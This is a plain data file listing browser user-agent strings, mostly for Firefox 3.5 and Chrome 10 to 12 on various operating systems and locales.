Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.4 (build 02647) Firefox/3.5.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.5 (build 02842) Firefox/3.5.6
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 GTB6 (.NET CLR 3.5.30729) FBSMTWB
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729) FBSMTWB
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.5
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8pre) Gecko/20091227 Ubuntu/9.10 (karmic) Firefox/3.5.5
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.5) Gecko/20091114 Gentoo Firefox/3.5.5
Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; uk; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.1.5) Gecko/Firefox/3.5.5
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5
Mozilla/5.0 (Windows NT 5.1; U; zh-cn; rv:1.8.1) Gecko/20091102 Firefox/3.5.5
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; pl; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 FBSMTWB
Mozilla/5.0 (X11; U; Linux x86_64; ja; rv:1.9.1.4) Gecko/20091016 SUSE/3.5.4-1.1.2 Firefox/3.5.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729) FBSMTWB
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.4) Gecko/20091016 Firefox/3.5.4 ( .NET CLR 3.5.30729; .NET4.0E)
Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4
Mozilla/5.0 (X11; U; Linux x86_64; fr; rv:1.9.1.5) Gecko/20091109 Ubuntu/9.10 (karmic) Firefox/3.5.3pre
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090914 Slackware/13.0_stable Firefox/3.5.3
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3
Mozilla/5.0 (X11; U; Linux i686; ru; rv:1.9.1.3) Gecko/20091020 Ubuntu/9.10 (karmic) Firefox/3.5.3
Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090919 Firefox/3.5.3
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.3) Gecko/20090912 Gentoo Firefox/3.5.3 FirePHP/0.3
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 GTB5
Mozilla/5.0 (X11; U; FreeBSD i386; ru-RU; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.5.3;MEGAUPLOAD 1.0 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 6.0; ko; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.21022; .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; bg; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; pl; rv:1.9.1.2) Gecko/20090911 Slackware Firefox/3.5.2
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090803 Slackware Firefox/3.5.2
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.2) Gecko/20090803 Firefox/3.5.2 Slackware
Mozilla/5.0 (X11; U; Linux i686; ru-RU; rv:1.9.1.2) Gecko/20090804 Firefox/3.5.2
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Slackware/13.0 Firefox/3.5.2
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (X11; U; Linux i686 (x86_64); fr; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB7.1 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; es-MX; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-TW; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; uk; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 FirePHP/0.4
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.16) Gecko/20101130 AskTbMYC/3.9.1.14019 Firefox/3.5.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.16) Gecko/20101130 MRA 5.4 (build 02647) Firefox/3.5.16 ( .NET CLR 3.5.30729; .NET4.0C)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.16) Gecko/20101130 AskTbPLTV5/3.8.0.12304 Firefox/3.5.16 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.1.16) Gecko/20101130 Firefox/3.5.16 GTB7.1
Mozilla/5.0 (X11; U; Linux x86_64; it; rv:1.9.1.15) Gecko/20101027 Fedora/3.5.15-1.fc12 Firefox/3.5.15
Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.1.15) Gecko/20101027 Fedora/3.5.15-1.fc12 Firefox/3.5.15
Mozilla/5.0 (Windows; U; Windows NT 5.0; ru; rv:1.9.1.13) Gecko/20100914 Firefox/3.5.13
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.5.12
Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.1.12) Gecko/20100824 MRA 5.7 (build 03755) Firefox/3.5.12
Mozilla/5.0 (X11; U; Linux; en-US; rv:1.9.1.11) Gecko/20100720 Firefox/3.5.11
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 ( .NET CLR 3.5.30729; .NET4.0C)
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11 ( .NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 5.1; hu; rv:1.9.1.11) Gecko/20100701 Firefox/3.5.11
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.11 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; de; rv:1.9.1.10) Gecko/20100506 SUSE/3.5.10-0.1.1 Firefox/3.5.10
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 ( .NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux x86_64; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.3) Gecko/20100524 Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Linux Mint/7 (Gloria) Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090716 Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux x86; rv:1.9.1.1) Gecko/20090716 Linux Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux i686; nl; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2pre) Gecko/20090729 Ubuntu/9.04 (jaunty) Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090722 Gentoo Firefox/3.5.1
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1.1) Gecko/20090714 SUSE/3.5.1-1.1 Firefox/3.5.1
Mozilla/5.0 (X11; U; DragonFly i386; de; rv:1.9.1) Gecko/20090720 Firefox/3.5.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; tr; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 4.0.20506)
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11;U; Linux i686; en-GB; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5
Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1) Gecko/20090630 Firefox/3.5 GTB6
Mozilla/5.0 (X11; U; Linux i686; ja; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686; fr-FR; rv:1.9.1) Gecko/20090624 Ubuntu/9.04 (jaunty) Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1) Gecko/20090701 Ubuntu/9.04 (jaunty) Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686; en-us; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Ubuntu/8.04 (hardy) Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686; de; rv:1.9.1) Gecko/20090624 Firefox/3.5
Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1) Gecko/20090624 Firefox/3.5
Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.1) Gecko/20090703 Firefox/3.5
Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.9.0.10) Gecko/20090624 Firefox/3.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; pl; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5 (.NET CLR 4.0.20506)
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1) Gecko/20090612 Firefox/3.5
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 4.0.20506)
Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.1) Gecko/20090624 Firefox/3.5
Mozilla/5.0 (Windows; U; Windows NT 6.0; zh-TW; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.25 (KHTML, like Gecko) Chrome/12.0.706.0 Safari/534.25
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.703.0 Chrome/12.0.703.0 Safari/534.24
Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.10 Chromium/12.0.702.0 Chrome/12.0.702.0 Safari/534.24
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24
Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.699.0 Safari/534.24
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.698.0 Safari/534.24
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.697.0 Safari/534.24
Mozilla/5.0 (Windows NT 5.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.43 Safari/534.24
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24
Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.34 Safari/534.24
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24
Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24
Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.14 Safari/534.24
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.12 Safari/534.24
Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/534.24 (KHTML, like Gecko) Ubuntu/10.04 Chromium/11.0.696.0 Chrome/11.0.696.0 Safari/534.24
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.0 Safari/534.24
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.694.0 Safari/534.24
Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.23 (KHTML, like Gecko) Chrome/11.0.686.3 Safari/534.23
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.682.0 Safari/534.21
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7_0; en-US) AppleWebKit/534.21 (KHTML, like Gecko) Chrome/11.0.678.0 Safari/534.21
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Mozilla/5.0 (Windows NT) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.669.0 Safari/534.20
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.19 (KHTML, like Gecko) Chrome/11.0.661.0 Safari/534.19
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.661.0 Safari/534.18
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.18 (KHTML, like Gecko) Chrome/11.0.660.0 Safari/534.18
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.655.0 Safari/534.17
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.654.0 Safari/534.17
Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.652.0 Safari/534.17
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17
Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/10.0.649.0 Safari/534.17
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.82 Safari/534.16
Mozilla/5.0 (X11; U; Linux armv7l; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Mozilla/5.0 (X11; U; FreeBSD x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Mozilla/5.0 (X11; U; FreeBSD i386; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.134 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.133 Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.133 Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.127 Chrome/10.0.648.127 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.127 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; ru-RU) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.11 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.648.0 Chrome/10.0.648.0 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.0 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.642.0 Chrome/10.0.642.0 Safari/534.16
Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_5; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.639.0 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.638.0 Safari/534.16
Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.634.0 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.16 SUSE/10.0.626.0 (KHTML, like Gecko) Chrome/10.0.626.0 Safari/534.16
Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.613.0 Chrome/10.0.613.0 Safari/534.15
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.04 Chromium/10.0.612.3 Chrome/10.0.612.3 Safari/534.15
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.612.1 Safari/534.15
Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Ubuntu/10.10 Chromium/10.0.611.0 Chrome/10.0.611.0 Safari/534.15
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.602.0 Safari/534.14
Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/10.0.601.0 Safari/534.14
